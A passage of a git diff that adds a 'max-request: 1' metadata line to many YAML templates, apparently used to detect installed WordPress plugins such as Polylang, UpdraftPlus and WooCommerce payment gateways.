tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml 